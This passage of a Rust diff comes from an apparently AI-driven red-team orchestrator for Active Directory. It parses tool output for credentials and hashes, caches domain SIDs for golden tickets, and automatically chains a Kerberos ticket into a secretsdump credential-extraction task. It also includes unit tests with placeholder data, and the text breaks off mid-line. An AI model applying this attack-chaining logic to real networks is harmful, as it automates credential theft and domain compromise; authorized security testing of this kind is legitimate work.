&Throttler, +) { + let task_id = &completed.task_id; + let result = &completed.result; + + let cred_key = { + let state = dispatcher.state.read().await; + state + .pending_tasks + .get(task_id.as_str()) + .and_then(|t| t.params.get("credential_key")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) + }; + + { + let core_result = ares_core::models::TaskResult { + task_id: task_id.clone(), + success: result.success, + result: result.result.clone(), + error: result.error.clone(), + completed_at: result.completed_at.unwrap_or_else(chrono::Utc::now), + }; + let _ = dispatcher + .state + .complete_task(&dispatcher.queue, task_id, core_result) + .await; + } + + if result.success { + info!( + task_id = %task_id, + agent = result.agent_name.as_deref().unwrap_or("unknown"), + "Task completed successfully" + ); + throttler.clear_rate_limit_error().await; + } else { + let err_msg = result.error.as_deref().unwrap_or("unknown error"); + warn!(task_id = %task_id, err = err_msg, "Task failed"); + + if err_msg.to_lowercase().contains("rate limit") || err_msg.to_lowercase().contains("429") { + throttler.record_rate_limit_error().await; + } + // Don't return early — failed tasks (MaxSteps, Error) may still carry + // parser-extracted discoveries from tool calls that ran before failure. + // All discoveries now come from regex parsers, not LLM hallucination. + } + + // Extract discoveries ONLY from the "discoveries" key — populated exclusively + // by ares-tools parsers in submission.rs. The top-level payload is LLM-generated + // and must never be fed into parse_discoveries() (hallucination risk). + if let Some(ref payload) = result.result { + if let Some(disc) = payload.get("discoveries") { + if let Err(e) = extract_discoveries(disc, dispatcher).await { + warn!(task_id = %task_id, err = %e, "Failed to extract parser discoveries"); + } + check_domain_admin_indicators(disc, dispatcher).await; + } + } + + // Secondary pass: regex-based extraction from raw text in the result. + // This catches discoveries that the per-tool parsers or LLM may have missed. + if let Some(ref payload) = result.result { + let default_domain = get_default_domain(dispatcher).await; + extract_from_raw_text(payload, dispatcher, &default_domain).await; + } + + // Domain SID extraction: scan raw text for S-1-5-21-... patterns (from secretsdump). + // Caches the SID for golden ticket generation without needing lookupsid. + if let Some(ref payload) = result.result { + extract_and_cache_domain_sid(payload, dispatcher).await; + } + + // S4U auto-chain: detect .ccache in output and dispatch secretsdump with ticket. + // Mirrors Python's _auto_chain_s4u_lateral_movement — when a task produces a + // Kerberos ticket (.ccache), chain a secretsdump using that ticket for + // immediate credential extraction. + if let Some(ref payload) = result.result { + auto_chain_s4u_secretsdump(payload, dispatcher, &completed.task_id).await; + } + + if result.success { + if let Some(ref payload) = result.result { + check_golden_ticket_completion(payload, &completed.task_id, dispatcher).await; + } + } + + if result.success { + if let Some(vuln_id) = completed + .task_id + .starts_with("exploit_") + .then(|| { + result + .result + .as_ref() + .and_then(|r| r.get("vuln_id")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) + }) + .flatten() + { + info!(vuln_id = %vuln_id, task_id = %task_id, "Marking vulnerability as exploited"); + if let Err(e) = dispatcher + .state + .mark_exploited(&dispatcher.queue, &vuln_id) + .await + { + warn!(err = %e, vuln_id = %vuln_id, "Failed to mark vulnerability exploited"); + } + } + } + + if let Some(ref key) = cred_key { + if has_lockout_in_result(result) { + if let Some((username, domain)) = key.split_once('@') { + warn!( + credential = %key, + task_id = %task_id, + "Credential quarantined for 5 min: lockout detected" + ); + dispatcher + .state + .write() + .await + .quarantine_credential(username, domain); + } + } + } + + dispatcher.credential_access_notify.notify_waiters(); + dispatcher.delegation_notify.notify_waiters(); + + let _ = dispatcher.notify_state_update().await; +} + +/// Get the default domain from state (first domain, or empty string). +async fn get_default_domain(dispatcher: &Arc) -> String { + let state = dispatcher.state.read().await; + state.domains.first().cloned().unwrap_or_default() +} + +/// S4U auto-chain: detect .ccache ticket in task output and dispatch secretsdump. +/// +/// Mirrors Python's `_auto_chain_s4u_lateral_movement` — when a task produces a +/// Kerberos ticket file (.ccache), automatically dispatch a secretsdump task using +/// that ticket. This chains S4U/delegation → secretsdump without waiting for the +/// next automation cycle. +async fn auto_chain_s4u_secretsdump(payload: &Value, dispatcher: &Arc, task_id: &str) { + // Collect ONLY raw tool output fields — never LLM-generated summaries. + let mut text_parts: Vec<&str> = Vec::new(); + for key in &["tool_output", "output"] { + if let Some(s) = payload.get(*key).and_then(|v| v.as_str()) { + text_parts.push(s); + } + } + if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for item in arr { + if let Some(s) = item.as_str() { + text_parts.push(s); + } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { + text_parts.push(s); + } + } + } + + let combined = text_parts.join("\n"); + let ticket_path = match ares_llm::routing::extract_ticket_path(&combined) { + Some(p) => p, + None => return, // No .ccache found + }; + + info!( + task_id = %task_id, + ticket_path = %ticket_path, + "Detected .ccache ticket — chaining secretsdump" + ); + + // Try to extract target from the task params (target_spn → host) or ccache filename + let target_ip = payload + .get("target_spn") + .and_then(|v| v.as_str()) + .and_then(ares_llm::routing::extract_host_from_spn) + .or_else(|| { + // Try to parse target from ccache filename: + // Administrator@cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache + let fname = ticket_path.rsplit('/').next().unwrap_or(&ticket_path); + if let Some(at_pos) = fname.find('@') { + let after = &fname[at_pos + 1..]; + // Extract hostname: cifs_dc01.contoso.local@REALM.ccache + let host_part = after.split('@').next().unwrap_or(after).replace('_', "."); + // Remove the service prefix (cifs. → dc01.contoso.local) + if let Some(dot_pos) = host_part.find('.') { + let candidate = &host_part[dot_pos + 1..]; + if candidate.contains('.') { + return Some(candidate.to_string()); + } + } + } + None + }) + .or_else(|| { + // Fallback: use target_ip from the task payload + payload + .get("target_ip") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) + }) + .or_else(|| { + payload + .get("target") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) + }); + + let target_ip = match target_ip { + Some(ip) => ip, + None => { + warn!(task_id = %task_id, "S4U auto-chain: .ccache found but no target could be determined"); + return; + } + }; + + // Resolve target IP if it's a hostname + let resolved_ip = { + let state = dispatcher.state.read().await; + // Check if target_ip is actually an IP already + if target_ip.parse::().is_ok() { + target_ip.clone() + } else { + // It's a hostname — look up in hosts + state + .hosts + .iter() + .find(|h| h.hostname.to_lowercase() == target_ip.to_lowercase()) + .map(|h| h.ip.clone()) + .unwrap_or(target_ip.clone()) + } + }; + + let domain = payload.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + + // Dispatch secretsdump with ticket (no password needed). + // Must include username — secretsdump requires it even with -k -no-pass. + // The S4U impersonates Administrator, so use that as default. + let username = payload + .get("impersonate") + .and_then(|v| v.as_str()) + .unwrap_or("Administrator"); + let sd_payload = serde_json::json!({ + "technique": "secretsdump", + "techniques": ["secretsdump"], + "target_ip": resolved_ip, + "username": username, + "domain": domain, + "ticket_path": ticket_path, + "no_pass": true, + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", sd_payload, 2) + .await + { + Ok(Some(new_task_id)) => { + info!( + parent_task = %task_id, + chained_task = %new_task_id, + target = %resolved_ip, + ticket = %ticket_path, + "S4U auto-chain: secretsdump dispatched with ticket" + ); + } + Ok(None) => {} + Err(e) => warn!(err = %e, "S4U auto-chain: failed to dispatch secretsdump"), + } +} + +/// Extract discoveries from raw text fields in the result payload. +/// +/// Collects text from raw tool output fields ("tool_output", "output", "tool_outputs") +/// and runs regex-based extraction on the combined text. This mirrors Python's +/// `_process_output_text()` — a safety net that catches discoveries the per-tool +/// parsers or LLM-reported structured data may have missed. +async fn extract_from_raw_text( + payload: &Value, + dispatcher: &Arc, + default_domain: &str, +) { + // Only parse tool_outputs — actual tool stdout collected by the agent loop. + // The result payload's "summary", "result", and "output" fields are all + // LLM-generated prose and MUST NOT be fed into regex extractors (they produce + // false positives like "Password : only" from conversational text). + // + // Structured discoveries from tool-call parsers are already handled by + // extract_discoveries() via the "discoveries" key — this pass is a secondary + // safety net for raw tool stdout that parsers may have missed. + let mut text_parts: Vec<&str> = Vec::new(); + + if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for item in arr { + if let Some(s) = item.as_str() { + text_parts.push(s); + } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { + text_parts.push(s); + } + } + } + + if text_parts.is_empty() { + return; + } + + // Process each tool output independently to prevent stateful parsers + // (e.g. extract_plaintext_passwords's current_user tracker) from leaking + // context across unrelated tool calls — a joined string caused false + // credential attribution (e.g. john.smith:Summer2025 from stale context). + let mut extracted = output_extraction::TextExtractions::default(); + for part in &text_parts { + let partial = output_extraction::extract_from_output_text(part, default_domain); + extracted.credentials.extend(partial.credentials); + extracted.hashes.extend(partial.hashes); + extracted.hosts.extend(partial.hosts); + extracted.users.extend(partial.users); + extracted.shares.extend(partial.shares); + } + + if extracted.is_empty() { + return; + } + + let mut new_count = 0usize; + + for cred in extracted.credentials { + let is_cracked = cred.source.starts_with("cracked:"); + let cracked_username = cred.username.clone(); + let cracked_domain = cred.domain.clone(); + let cracked_password = cred.password.clone(); + match dispatcher + .state + .publish_credential(&dispatcher.queue, cred) + .await + { + Ok(true) => { + new_count += 1; + // When a cracked credential is published, update the corresponding + // hash's cracked_password field in state and Redis. + if is_cracked { + let _ = dispatcher + .state + .update_hash_cracked_password( + &dispatcher.queue, + &cracked_username, + &cracked_domain, + &cracked_password, + ) + .await; + } + } + Ok(false) => {} // duplicate + Err(e) => warn!(err = %e, "Failed to publish text-extracted credential"), + } + } + + for hash in extracted.hashes { + match dispatcher.state.publish_hash(&dispatcher.queue, hash).await { + Ok(true) => new_count += 1, + Ok(false) => {} + Err(e) => warn!(err = %e, "Failed to publish text-extracted hash"), + } + } + + for host in extracted.hosts { + let _ = dispatcher.state.publish_host(&dispatcher.queue, host).await; + } + + // Users intentionally NOT published from raw text extraction. + // The DOMAIN\user regex matches every wordlist entry in kerbrute/ASREProast + // output (e.g. "[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set"). + // Only per-tool parsers (kerberos_enum, netexec_user_enum) produce verified + // users gated by KDC response patterns. + + for share in extracted.shares { + match dispatcher + .state + .publish_share(&dispatcher.queue, share) + .await + { + Ok(true) => new_count += 1, + Ok(false) => {} + Err(e) => warn!(err = %e, "Failed to publish text-extracted share"), + } + } + + // Pwn3d! detection: scan raw text for admin indicators and upgrade credentials. + // netexec output like "[+] DOMAIN\user:password (Pwn3d!)" means the credential + // has local admin rights. Mark existing credentials as is_admin and trigger + // immediate high-priority secretsdump. + // Check each tool output independently (joining is safe here — Pwn3d! is a + // standalone marker with no stateful context to leak). + for part in &text_parts { + if part.contains("Pwn3d!") { + detect_and_upgrade_admin_credentials(part, dispatcher).await; + } + } + + if new_count > 0 { + info!( + count = new_count, + "Published new discoveries from raw text extraction" + ); + } +} + +/// Extract credentials, hashes, hosts, vulns, and shares from a result payload. +async fn extract_discoveries(payload: &Value, dispatcher: &Arc) -> Result<()> { + let mut parsed = parse_discoveries(payload); + + // Resolve credential lineage (parent_id / attack_step) before publishing. + // Read lock is released before any publish calls (which take write locks). + { + let state = dispatcher.state.read().await; + for cred in &mut parsed.credentials { + if cred.parent_id.is_none() { + let (pid, step) = resolve_parent_id( + &state.credentials, + &state.hashes, + &cred.source, + &cred.username, + &cred.domain, + None, + None, + ); + cred.parent_id = pid; + cred.attack_step = step; + } + } + for hash in &mut parsed.hashes { + if hash.parent_id.is_none() { + let (pid, step) = resolve_parent_id( + &state.credentials, + &state.hashes, + &hash.source, + &hash.username, + &hash.domain, + None, + None, + ); + hash.parent_id = pid; + hash.attack_step = step; + } + } + } + + for cred in parsed.credentials { + // Capture fields before move for timeline event + let source = cred.source.clone(); + let username = cred.username.clone(); + let domain = cred.domain.clone(); + let password = cred.password.clone(); + let is_admin = cred.is_admin; + let is_cracked = source.starts_with("cracked"); + match dispatcher + .state + .publish_credential(&dispatcher.queue, cred) + .await + { + Ok(true) => { + debug!("Published new credential from result"); + create_credential_timeline_event(dispatcher, &source, &username, &domain, is_admin) + .await; + // When a cracked credential is published, update the corresponding + // hash's cracked_password field in state and Redis. + if is_cracked { + let _ = dispatcher + .state + .update_hash_cracked_password( + &dispatcher.queue, + &username, + &domain, + &password, + ) + .await; + } + } + Ok(false) => {} // duplicate + Err(e) => warn!(err = %e, "Failed to publish credential"), + } + } + + for hash in parsed.hashes { + // Capture fields before move for timeline event + let username = hash.username.clone(); + let domain = hash.domain.clone(); + let hash_type = hash.hash_type.clone(); + let hash_value = hash.hash_value.clone(); + let source = hash.source.clone(); + match dispatcher.state.publish_hash(&dispatcher.queue, hash).await { + Ok(true) => { + debug!("Published new hash from result"); + create_hash_timeline_event( + dispatcher, + &username, + &domain, + &hash_type, + &hash_value, + &source, + ) + .await; + } + Ok(false) => {} + Err(e) => warn!(err = %e, "Failed to publish hash"), + } + } + + for host in parsed.hosts { + let _ = dispatcher.state.publish_host(&dispatcher.queue, host).await; + } + + for user in parsed.users { + match dispatcher.state.publish_user(&dispatcher.queue, user).await { + Ok(true) => debug!("Published new user from result"), + Ok(false) => {} + Err(e) => warn!(err = %e, "Failed to publish user"), + } + } + + for vuln in parsed.vulnerabilities { + let _ = dispatcher + .state + .publish_vulnerability(&dispatcher.queue, vuln) + .await; + } + + for share in parsed.shares { + match dispatcher + .state + .publish_share(&dispatcher.queue, share) + .await + { + Ok(true) => debug!("Published new share from result"), + Ok(false) => {} + Err(e) => warn!(err = %e, "Failed to publish share"), + } + } + + // Extract trusted_domains from parser output + if let Some(trusts) = payload.get("trusted_domains").and_then(|v| v.as_array()) { + for trust_val in trusts { + if let Ok(trust) = + serde_json::from_value::(trust_val.clone()) + { + match dispatcher + .state + .publish_trust_info(&dispatcher.queue, trust) + .await + { + Ok(true) => info!("Published new trust relationship from result"), + Ok(false) => {} + Err(e) => warn!(err = %e, "Failed to publish trust info"), + } + } + } + } + + Ok(()) +} diff --git a/ares-cli/src/orchestrator/result_processing/parsing.rs b/ares-cli/src/orchestrator/result_processing/parsing.rs new file mode 100644 index 00000000..dc850d64 --- /dev/null +++ b/ares-cli/src/orchestrator/result_processing/parsing.rs @@ -0,0 +1,159 @@ +//! Pure parsing functions for result payloads -- no IO, no Redis. + +use serde_json::Value; + +use ares_core::models::{Credential, Hash, Host, Share, User, VulnerabilityInfo}; + +/// Parsed discoveries from a JSON result payload. +#[derive(Debug, Default)] +pub(crate) struct ParsedDiscoveries { + pub credentials: Vec, + pub hashes: Vec, + pub hosts: Vec, + pub users: Vec, + pub vulnerabilities: Vec, + pub shares: Vec, +} + +/// Resolve the parent credential or hash for a newly discovered item. +pub(crate) fn resolve_parent_id( + credentials: &[Credential], + hashes: &[Hash], + source: &str, + username: &str, + domain: &str, + input_username: Option<&str>, + input_domain: Option<&str>, +) -> (Option, i32) { + if source.starts_with("cracked") { + if let Some(h) = hashes.iter().rev().find(|h| { + h.username.eq_ignore_ascii_case(username) + && (domain.is_empty() || h.domain.eq_ignore_ascii_case(domain)) + }) { + return (Some(h.id.clone()), h.attack_step + 1); + } + } + if let Some(in_user) = input_username.filter(|u| !u.is_empty()) { + let in_domain = input_domain.unwrap_or(""); + let is_same = in_user.eq_ignore_ascii_case(username) + && (in_domain.eq_ignore_ascii_case(domain) + || in_domain.is_empty() + || domain.is_empty()); + if !is_same { + if let Some(c) = credentials.iter().rev().find(|c| { + c.username.eq_ignore_ascii_case(in_user) + && (in_domain.is_empty() + || c.domain.is_empty() + || c.domain.eq_ignore_ascii_case(in_domain)) + }) { + return (Some(c.id.clone()), c.attack_step + 1); + } + if let Some(h) = hashes.iter().rev().find(|h| { + h.username.eq_ignore_ascii_case(in_user) + && (in_domain.is_empty() + || h.domain.is_empty() + || h.domain.eq_ignore_ascii_case(in_domain)) + }) { + return (Some(h.id.clone()), h.attack_step + 1); + } + } + } + (None, 0) +} + +pub(crate) fn parse_discoveries(payload: &Value) -> ParsedDiscoveries { + let mut result = ParsedDiscoveries::default(); + + if let Some(creds) = payload.get("credentials").and_then(|v| v.as_array()) { + for cred_val in creds { + if let Ok(cred) = serde_json::from_value::(cred_val.clone()) { + result.credentials.push(cred); + } + } + } + if let Some(cred_val) = payload.get("credential") { + if let Ok(cred) = serde_json::from_value::(cred_val.clone()) { + result.credentials.push(cred); + } + } + if let Some(cracked) = payload.get("cracked_password").and_then(|v| v.as_str()) { + if let Some(username) = payload.get("username").and_then(|v| v.as_str()) { + let domain = payload.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + result.credentials.push(Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: cracked.to_string(), + domain: domain.to_string(), + source: "cracked".to_string(), + discovered_at: Some(chrono::Utc::now()), + is_admin: false, + parent_id: None, + attack_step: 0, + }); + } + } + if let Some(hashes) = payload.get("hashes").and_then(|v| v.as_array()) { + for hash_val in hashes { + if let Ok(hash) = serde_json::from_value::(hash_val.clone()) { + result.hashes.push(hash); + } + } + } + if let Some(hosts) = payload.get("hosts").and_then(|v| v.as_array()) { + for host_val in hosts { + if let Ok(host) = serde_json::from_value::(host_val.clone()) { + result.hosts.push(host); + } + } + } + // Users -- defense-in-depth: only accept entries with a parser-verified source. + const TRUSTED_USER_SOURCES: &[&str] = &["kerberos_enum", "netexec_user_enum"]; + if let Some(users) = payload.get("discovered_users").and_then(|v| v.as_array()) { + for user_val in users { + if let Ok(user) = serde_json::from_value::(user_val.clone()) { + if TRUSTED_USER_SOURCES.contains(&user.source.as_str()) { + result.users.push(user); + } + } + } + } + if let Some(vulns) = payload.get("vulnerabilities").and_then(|v| v.as_array()) { + for vuln_val in vulns { + if let Ok(vuln) = serde_json::from_value::(vuln_val.clone()) { + result.vulnerabilities.push(vuln); + } + } + } + if result.vulnerabilities.is_empty() { + if let Some(vuln_val) = payload.get("vulnerability") { + if let Ok(vuln) = serde_json::from_value::(vuln_val.clone()) { + result.vulnerabilities.push(vuln); + } + } + } + if let Some(shares) = payload.get("shares").and_then(|v| v.as_array()) { + for share_val in shares { + if let Ok(share) = serde_json::from_value::(share_val.clone()) { + result.shares.push(share); + } + } + } + result +} + +/// Check if a payload contains domain admin indicators. Pure function. +pub(crate) fn has_domain_admin_indicator(payload: &Value) -> bool { + if payload.get("has_domain_admin").and_then(|v| v.as_bool()) == Some(true) { + return true; + } + if let Some(hashes) = payload.get("hashes").and_then(|v| v.as_array()) { + for hash_val in hashes { + if let Some(username) = hash_val.get("username").and_then(|v| v.as_str()) { + if username.to_lowercase() == "krbtgt" { + return true; + } + } + } + } + false +} diff --git a/ares-cli/src/orchestrator/result_processing/tests.rs b/ares-cli/src/orchestrator/result_processing/tests.rs new file mode 100644 index 00000000..69658a47 --- /dev/null +++ b/ares-cli/src/orchestrator/result_processing/tests.rs @@ -0,0 +1,211 @@ +use super::parsing::{has_domain_admin_indicator, parse_discoveries}; +use serde_json::json; + +#[test] +fn test_parse_credentials_array() { + let payload = json!({ + "credentials": [ + {"id": "c1", "username": "admin", "password": "P@ss1", + "domain": "contoso.local", "source": "kerberoast", "is_admin": false, "attack_step": 0}, + {"id": "c2", "username": "svc_sql", "password": "SqlPass1", + "domain": "contoso.local", "source": "secretsdump", "is_admin": false, "attack_step": 0} + ] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.credentials.len(), 2); + assert_eq!(parsed.credentials[0].username, "admin"); + assert_eq!(parsed.credentials[1].username, "svc_sql"); +} + +#[test] +fn test_parse_single_credential() { + let payload = json!({ + "credential": { + "id": "c1", "username": "admin", "password": "P@ss1", + "domain": "contoso.local", "source": "ntlm_relay", "is_admin": false, "attack_step": 0 + } + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.credentials.len(), 1); + assert_eq!(parsed.credentials[0].source, "ntlm_relay"); +} + +#[test] +fn test_parse_cracked_password() { + let payload = + json!({"cracked_password": "Summer2024!", "username": "jdoe", "domain": "contoso.local"}); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.credentials.len(), 1); + assert_eq!(parsed.credentials[0].username, "jdoe"); + assert_eq!(parsed.credentials[0].password, "Summer2024!"); + assert_eq!(parsed.credentials[0].source, "cracked"); +} + +#[test] +fn test_parse_cracked_password_without_username_ignored() { + let payload = json!({"cracked_password": "Summer2024!"}); + let parsed = parse_discoveries(&payload); + assert!(parsed.credentials.is_empty()); +} + +#[test] +fn test_parse_hashes() { + let payload = json!({ + "hashes": [{"id": "h1", "username": "Administrator", "hash_value": "aad3b435:abcdef123456", + "hash_type": "NTLM", "domain": "contoso.local", "source": "secretsdump", + "is_cracked": false, "attack_step": 0}] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.hashes.len(), 1); + assert_eq!(parsed.hashes[0].username, "Administrator"); + assert_eq!(parsed.hashes[0].hash_type, "NTLM"); +} + +#[test] +fn test_parse_hosts() { + let payload = json!({ + "hosts": [{"ip": "192.168.58.10", "hostname": "dc01.contoso.local", + "os": "Windows Server 2019", "is_dc": true, "open_ports": [88, 389, 445]}] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.hosts.len(), 1); + assert_eq!(parsed.hosts[0].ip, "192.168.58.10"); + assert!(parsed.hosts[0].is_dc); +} + +#[test] +fn test_parse_users_with_trusted_source() { + let payload = json!({ + "discovered_users": [{"username": "jdoe", "domain": "contoso.local", + "source": "kerberos_enum", "is_admin": false}] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.users.len(), 1); + assert_eq!(parsed.users[0].username, "jdoe"); +} + +#[test] +fn test_parse_users_rejects_untrusted_source() { + let payload = json!({ + "discovered_users": [ + {"username": "fake_admin", "domain": "contoso.local", "is_admin": false}, + {"username": "also_fake", "domain": "contoso.local", + "source": "llm_hallucination", "is_admin": false} + ] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.users.len(), 0); +} + +#[test] +fn test_parse_vulnerabilities() { + let payload = json!({ + "vulnerabilities": [{"vuln_id": "vuln-001", "vuln_type": "constrained_delegation", + "target": "192.168.58.20", "discovered_by": "recon", + "details": {"account": "svc_sql"}, "recommended_agent": "privesc", + "priority": 3}] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.vulnerabilities.len(), 1); + assert_eq!( + parsed.vulnerabilities[0].vuln_type, + "constrained_delegation" + ); +} + +#[test] +fn test_parse_shares() { + let payload = json!({ + "shares": [ + {"host": "192.168.58.10", "name": "SYSVOL", "permissions": "READ", "comment": "Logon server share"}, + {"host": "192.168.58.10", "name": "ADMIN$", "permissions": "READ,WRITE"} + ] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.shares.len(), 2); + assert_eq!(parsed.shares[0].name, "SYSVOL"); + assert_eq!(parsed.shares[1].name, "ADMIN$"); +} + +#[test] +fn test_parse_empty_payload() { + let payload = json!({}); + let parsed = parse_discoveries(&payload); + assert!(parsed.credentials.is_empty()); + assert!(parsed.hashes.is_empty()); + assert!(parsed.hosts.is_empty()); + assert!(parsed.users.is_empty()); + assert!(parsed.vulnerabilities.is_empty()); + assert!(parsed.shares.is_empty()); +} + +#[test] +fn test_parse_malformed_entries_skipped() { + let payload = json!({ + "credentials": [ + {"username": "valid", "id": "c1", "password": "x", "domain": "d", + "source": "s", "is_admin": false, "attack_step": 0}, + {"bad_field": "not a credential"} + ], + "hashes": [{"not_a_hash": true}] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.credentials.len(), 1); + assert!(parsed.hashes.is_empty()); +} + +#[test] +fn test_parse_mixed_payload() { + let payload = json!({ + "credentials": [{"id": "c1", "username": "admin", "password": "P@ss", + "domain": "contoso.local", "source": "test", "is_admin": true, "attack_step": 0}], + "hashes": [{"id": "h1", "username": "krbtgt", "hash_value": "abc123", "hash_type": "NTLM", + "domain": "contoso.local", "source": "secretsdump", "is_cracked": false, "attack_step": 0}], + "hosts": [{"ip": "192.168.58.10", "hostname": "dc01.contoso.local", "is_dc": true}], + "has_domain_admin": true, "domain_admin_path": "secretsdump -> Administrator" + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.credentials.len(), 1); + assert_eq!(parsed.hashes.len(), 1); + assert_eq!(parsed.hosts.len(), 1); +} + +#[test] +fn test_da_indicator_explicit_flag() { + assert!(has_domain_admin_indicator( + &json!({"has_domain_admin": true}) + )); +} + +#[test] +fn test_da_indicator_false_flag() { + assert!(!has_domain_admin_indicator( + &json!({"has_domain_admin": false}) + )); +} + +#[test] +fn test_da_indicator_krbtgt_hash() { + assert!(has_domain_admin_indicator( + &json!({"hashes": [{"username": "krbtgt", "hash_value": "abc"}]}) + )); +} + +#[test] +fn test_da_indicator_krbtgt_case_insensitive() { + assert!(has_domain_admin_indicator( + &json!({"hashes": [{"username": "KRBTGT", "hash_value": "abc"}]}) + )); +} + +#[test] +fn test_da_indicator_non_krbtgt_hash() { + assert!(!has_domain_admin_indicator( + &json!({"hashes": [{"username": "Administrator", "hash_value": "abc"}]}) + )); +} + +#[test] +fn test_da_indicator_empty_payload() { + assert!(!has_domain_admin_indicator(&json!({}))); +} diff --git a/ares-cli/src/orchestrator/result_processing/timeline.rs b/ares-cli/src/orchestrator/result_processing/timeline.rs new file mode 100644 index 00000000..a1b0f44e --- /dev/null +++ b/ares-cli/src/orchestrator/result_processing/timeline.rs @@ -0,0 +1,100 @@ +//! Timeline event helpers. + +use std::sync::Arc; + +use crate::orchestrator::dispatcher::Dispatcher; + +pub(crate) async fn create_credential_timeline_event( + dispatcher: &Arc, + source: &str, + username: &str, + domain: &str, + is_admin: bool, +) { + let mut techniques: Vec = vec![if is_admin { + "T1078".to_string() + } else { + "T1552".to_string() + }]; + let source_lower = source.to_lowercase(); + if source_lower.contains("kerberoast") { + techniques.push("T1558.003".to_string()); + } + if source_lower.contains("asrep") || source_lower.contains("as-rep") { + techniques.push("T1558.004".to_string()); + } + if source_lower.contains("cracked") { + techniques.push("T1110".to_string()); + } + let event_id = format!( + "evt-cred-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": source, + "description": format!("Credential discovered: {domain}\\{username} via {source}"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +pub(crate) async fn create_hash_timeline_event( + dispatcher: &Arc, + username: &str, + domain: &str, + hash_type: &str, + hash_value: &str, + source: &str, +) { + let mut techniques: Vec = vec!["T1003".to_string()]; + let hash_value_lower = hash_value.to_lowercase(); + let hash_type_lower = hash_type.to_lowercase(); + let source_lower = source.to_lowercase(); + if hash_value_lower.contains("$krb5tgs$") + || matches!( + hash_type_lower.as_str(), + "kerberoast" | "krb5tgs" | "tgs-rep" | "tgs" + ) + || source_lower.contains("kerberoast") + { + techniques.push("T1558.003".to_string()); + } + if hash_value_lower.contains("$krb5asrep$") + || matches!(hash_type_lower.as_str(), "asrep" | "as-rep" | "krb5asrep") + || source_lower.contains("asrep") + || source_lower.contains("as-rep") + { + techniques.push("T1558.004".to_string()); + } + if hash_type_lower == "ntlm" + && (source_lower.contains("secretsdump") || source_lower.contains("dcsync")) + { + techniques.push("T1003.006".to_string()); + } + let is_critical = matches!(username.to_lowercase().as_str(), "krbtgt" | "administrator"); + let description = if is_critical { + format!("CRITICAL: Hash discovered: {domain}\\{username} ({hash_type})") + } else { + format!("Hash discovered: {domain}\\{username} ({hash_type})") + }; + let event_id = format!( + "evt-hash-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": source, + "description": description, + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} diff --git a/ares-cli/src/orchestrator/results.rs b/ares-cli/src/orchestrator/results.rs new file mode 100644 index 00000000..0f5b01ae --- /dev/null +++ b/ares-cli/src/orchestrator/results.rs @@ -0,0 +1,185 @@ +//! Result consumption loop. +//! +//! A dedicated tokio task that polls Redis for completed task results and +//! feeds them back to the main orchestration loop via an mpsc channel. +//! Mirrors the Python `MonitoringMixin._result_consumer` but uses async +//! Rust instead of a dedicated thread. + +use std::sync::Arc; +use std::time::Duration; + +use anyhow::Result; +use tokio::sync::{mpsc, watch}; +use tracing::{debug, error, info, warn}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::routing::ActiveTaskTracker; +use crate::orchestrator::task_queue::{TaskQueue, TaskResult}; + +// --------------------------------------------------------------------------- +// CompletedTask — sent over the channel to the main loop +// --------------------------------------------------------------------------- + +/// A completed task result, ready for the orchestrator to process. +#[derive(Debug)] +pub struct CompletedTask { + pub task_id: String, + pub result: TaskResult, +} + +// --------------------------------------------------------------------------- +// Result consumer +// --------------------------------------------------------------------------- + +/// Spawn the result-consumer background task. +/// +/// Returns an mpsc receiver that the main loop reads from. +pub fn spawn_result_consumer( + queue: TaskQueue, + tracker: ActiveTaskTracker, + config: Arc, + mut shutdown: watch::Receiver, +) -> (tokio::task::JoinHandle<()>, mpsc::Receiver) { + // Bounded channel — back-pressure if the main loop can't keep up. + let (tx, rx) = mpsc::channel::(256); + + let handle = tokio::spawn(async move { + let mut consecutive_failures: u32 = 0; + let poll_interval = config.result_poll_interval; + + info!("Result consumer started"); + + loop { + // Check shutdown before each poll cycle + if *shutdown.borrow() { + info!("Result consumer shutting down"); + break; + } + + match consume_cycle(&queue, &tracker, &tx).await { + Ok(found) => { + if consecutive_failures > 0 { + info!( + prev_failures = consecutive_failures, + "Result consumer recovered" + ); + } + consecutive_failures = 0; + + if found > 0 { + debug!(results = found, "Consumed results"); + // When results arrive, poll again immediately instead + // of sleeping — results often come in bursts. + continue; + } + } + Err(e) => { + consecutive_failures += 1; + let is_conn = is_connection_error(&e); + + if is_conn { + let delay = Duration::from_secs(std::cmp::min( + 60, + 2_u64.pow(consecutive_failures.min(5)), + )); + + if consecutive_failures >= 10 { + error!( + attempt = consecutive_failures, + err = %e, + "Result consumer: Redis 